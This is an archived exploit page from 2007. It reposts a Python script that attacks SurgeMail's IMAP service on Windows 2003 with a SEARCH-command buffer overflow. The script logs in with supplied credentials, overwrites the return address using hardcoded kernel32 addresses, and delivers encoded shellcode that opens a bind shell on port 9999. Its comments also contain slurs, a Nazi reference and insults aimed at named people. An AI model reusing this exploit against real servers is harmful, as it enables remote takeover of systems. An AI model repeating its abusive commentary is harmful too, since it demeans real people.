Home / exploits SURGEMAIL.py.txt
Posted on 14 August 2007
#!/usr/bin/python import os import sys import time import socket import struct #this is imap exploit #710 bytes, tcp port 9999 bind, borrowed from skape miller inventor of megacanvas sc = "x90" sc += "x41x41x41x41x41x41x41x41x41x41x41x41x41xebx03x59" sc += "xebx05xe8xf8xffxffxffx49x49x49x49x49x49x49x49x49" sc += "x49x49x49x49x49x49x49x49x51x37x5ax6ax66x58x50x30" sc += "x41x31x42x41x6bx41x41x76x41x32x41x41x32x42x41x30" sc += "x42x41x58x50x38x41x42x75x79x79x4bx4cx32x4ax7ax4b" sc += "x42x6dx78x68x4cx39x4bx4fx4bx4fx4bx4fx75x30x6ex6b" sc += "x42x4cx45x74x71x34x6cx4bx41x55x57x4cx4ex6bx33x4c" sc += "x53x35x51x68x55x51x68x6fx4cx4bx72x6fx56x78x6ex6b" sc += "x61x4fx77x50x76x61x38x6bx52x69x4ex6bx36x54x4ex6b" sc += "x67x71x4ax4ex76x51x4fx30x6dx49x4ex4cx4dx54x4bx70" sc += "x41x64x43x37x4bx71x6bx7ax76x6dx54x41x4fx32x7ax4b" sc += "x6ax54x45x6bx33x64x56x44x77x58x34x35x6bx55x4cx4b" sc += "x61x4fx46x44x55x51x58x6bx31x76x6cx4bx46x6cx30x4b" sc += "x4ex6bx61x4fx75x4cx64x41x38x6bx53x33x54x6cx4cx4b" sc += "x6dx59x50x6cx64x64x55x4cx30x61x6bx73x74x71x4bx6b" sc += "x51x74x4cx4bx51x53x70x30x4cx4bx77x30x36x6cx4cx4b" sc += "x72x50x35x4cx4ex4dx6cx4bx73x70x57x78x31x4ex42x48" sc += "x4ex6ex50x4ex76x6ex5ax4cx30x50x6bx4fx49x46x75x36" sc += "x56x33x53x56x75x38x37x43x34x72x35x38x74x37x54x33" sc += "x44x72x63x6fx71x44x4bx4fx7ax70x42x48x38x4bx38x6d" sc += "x6bx4cx47x4bx30x50x4bx4fx4ex36x51x4fx4fx79x4dx35" sc += "x42x46x4bx31x7ax4dx33x38x57x72x76x35x61x7ax46x62" sc += "x4bx4fx6ex30x51x78x4bx69x67x79x59x65x6cx6dx41x47" sc += "x4bx4fx6ex36x41x43x56x33x76x33x52x73x70x53x51x53" sc += "x70x53x32x63x32x73x6bx4fx4ex30x41x76x62x48x36x47" sc += "x54x4fx41x76x72x73x4fx79x49x71x4ex75x31x78x6ex44" sc += "x67x6ax64x30x4fx37x70x57x69x6fx6ex36x70x6ax74x50" sc += "x62x71x73x65x4bx4fx38x50x62x48x4cx64x4ex4dx64x6e" sc += "x58x69x62x77x4bx4fx7ax76x50x53x51x45x39x6fx58x50" sc += "x71x78x6bx55x53x79x6fx76x53x79x36x37x39x6fx79x46" sc += "x72x70x61x44x33x64x62x75x59x6fx48x50x4ax33x51x78" sc += "x6dx37x71x69x79x56x71x69x70x57x6bx4fx6ex36x51x45" sc += "x69x6fx6ex30x45x36x63x5ax41x74x35x36x72x48x30x63" sc += "x50x6dx6fx79x59x75x63x5ax52x70x43x69x37x59x58x4c" sc += "x4fx79x79x77x52x4ax33x74x4dx59x39x72x55x61x4fx30" sc += "x7ax53x6dx7ax79x6ex47x32x76x4dx69x6ex47x32x34x6c" sc += "x6dx43x6cx4dx72x5ax54x78x4ex4bx4cx6bx6cx6bx75x38" sc += "x52x52x4bx4ex4ex53x55x46x79x6fx71x65x41x54x59x6f" sc += "x4ex36x43x6bx71x47x51x42x52x71x62x71x52x71x51x7a" sc += "x33x31x56x31x46x31x51x45x50x51x59x6fx4ex30x50x68" sc += "x4cx6dx6ex39x53x35x6ax6ex62x73x49x6fx5ax76x50x6a" sc += "x59x6fx4bx4fx34x77x59x6fx5ax70x6cx4bx32x77x39x6c" sc += "x6cx43x4bx74x61x74x6bx4fx6ax76x50x52x79x6fx6ex30" sc += "x42x48x7ax4fx6ax6ex59x70x63x50x42x73x4bx4fx48x56" sc += "x79x6fx4ex30x66" def Copulate(target,port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target,port)) return s def Fascism(target,u,p): safe_readable_null = 0x71c010e4 # Safe readable, preferably null (ws2_32 on win2k3) safe_writable = 0x0fff7004 # Safe writable (rsaenh.dll data section on win2k3) pop_then_ret = 0x77e41a26 # EIP (pop, ret in kernel32 on win2k3) call_esp = 0x77e839b3 # Return #2, call esp in kernel32. When hit, esp points at the next 4 bytes. s = Copulate(target,143) pkt = "0001 LOGIN "" pkt += u pkt += "" "" pkt += p pkt += "" " SendPacket(s,pkt) pkt = "0003 SELECT "Inbox" " SendPacket(s,pkt) pkt = "C284 SEARCH " pkt += "P"*1008 pkt += struct.pack('<L',safe_readable_null) pkt += "CUNT" # Word used to describe members of the infosec community. pkt += struct.pack('<L',pop_then_ret) pkt += struct.pack('<L',safe_writable) pkt += struct.pack('<L',call_esp) pkt += "A"*198 # I have boned over 198 bitches pkt += "xebx10" # Body Mass Index of Gadi Evron, hexadecimal LOLOLOLOL pkt += struct.pack('<L',safe_readable_null) pkt += "A"*16 # Unnecessary megathropic nopsled, invented by k2, founding member of n3td3v pkt += sc pkt += " (SAVE MIN) SINCE 12-Feb-1992 NOT FROM "Len Rose The Moderating Nazi of Full Disclosure, Original Founder of Zyklon B" " print "Sending. Hold on." SendPacket(s,pkt) time.sleep(3) print "The service will continue functioning but cannot be exploited again until restart." print "Please telnet to port 9999 on it now for a rootshell." print " -management" s.close() def SendPacket(s,pkt): s.send(pkt) # comment if __name__ == '__main__': try: target = sys.argv[1] u = sys.argv[2] p = sys.argv[3] except IndexError: print 'Usage: %s <ip address> <user> <pass>' % sys.argv[0] sys.exit(-1) Fascism(target,u,p)
